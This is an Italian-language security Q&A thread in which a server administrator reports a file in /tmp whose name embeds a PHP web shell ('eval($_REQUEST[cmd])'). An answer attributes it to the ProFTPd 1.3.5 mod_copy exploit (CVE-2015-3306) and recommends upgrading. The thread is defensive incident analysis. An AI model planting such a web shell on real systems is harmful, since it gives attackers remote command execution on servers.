codice PHP nel nome del file situato nella cartella / tmp. Quanto dovrei essere preoccupato?

3

Recentemente ho scoperto un file nascosto in /tmp di proftpd che mi preoccupa un po ':

-rw-r--r--  1 proftpd         nogroup       <timestamp>       86  .<?php eval($_REQUEST[cmd]); ?>

Ho provato a vedere il suo contenuto in un editor di testo, ma probabilmente si trattava di una brutta mossa poiché modifica l'ultima proprietà del tempo di accesso. Ad ogni modo ecco l'output di stat :

  File: ‘/tmp/.<?php eval($_REQUEST[cmd]);?>’
  Size: 86          Blocks: 8          IO Block: 4096   regular file
Device: fc00h/64512d    Inode: 175564      Links: 1
Access: (0644/-rw-r--r--)  Uid: (  113/ proftpd)   Gid: (65534/ nogroup)
Access: <another-timestamp>
Modify: <one-timestamp>
Change: <one-timestamp>
Birth: -

Il controllo del registro proftpd nel momento in cui il file è stato modificato mi dà un sacco di voci come questa:

<timestamp> <myhost> proftpd[9114] localhost.localdomain (<some-naughy-domain>[<IP>]): error opening destination file '/var/www/public_html/<hosted-domain>/www/dbvar.php' for copying: No such file or directory

Questo file potrebbe essere usato come parte di un exploit?

Sto lavorando in un ambiente server LAMP.

    
posta taran 17.04.2016 - 13:24
fonte

1 risposta

4

Sembra che qualcuno stia usando questo exploit:

ProFTPd 1.3.5 - Copia file

link

Ecco anche CVE-2015-3306 :

link

Controlla la tua versione proftpd proftpd -v , se è ancora vecchia versione quindi aggiorna a 1.3.6rc1 . Se vuoi qualcosa di meglio, allora considera di usare sftp e non ftp .

    
risposta data 17.04.2016 - 14:05
fonte

Leggi altre domande sui tag